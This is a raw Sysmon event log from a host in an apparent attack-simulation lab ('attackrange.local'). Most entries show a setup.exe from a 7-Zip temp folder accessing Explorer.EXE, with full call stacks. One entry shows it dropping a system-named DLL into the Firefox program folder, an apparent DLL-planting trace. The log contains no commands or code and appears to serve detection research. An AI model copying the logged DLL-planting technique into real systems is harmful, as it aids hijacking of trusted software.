13:59:52.130{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000014230Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.130{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000014229Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.130{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64) 10341000x800000000000000014228Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.130{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 11241100x800000000000000014227Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:59:52.130{59A5CD1D-9457-6005-2B05-00000000A301}6900C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exeC:\Program Files\Mozilla Firefox\api-ms-win-core-synch-l1-2-0.dll2021-01-18 13:59:52.130 10341000x800000000000000014226Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.130{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014225Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.130{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014224Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.130{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014223Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.130{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000014222Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.130{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014221Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.130{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014220Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.130{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3 10341000x800000000000000014219Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.130{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014218Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.130{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014217Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.130{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014216Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.130{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000014215Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.130{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64) 10341000x800000000000000014214Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.130{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014213Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 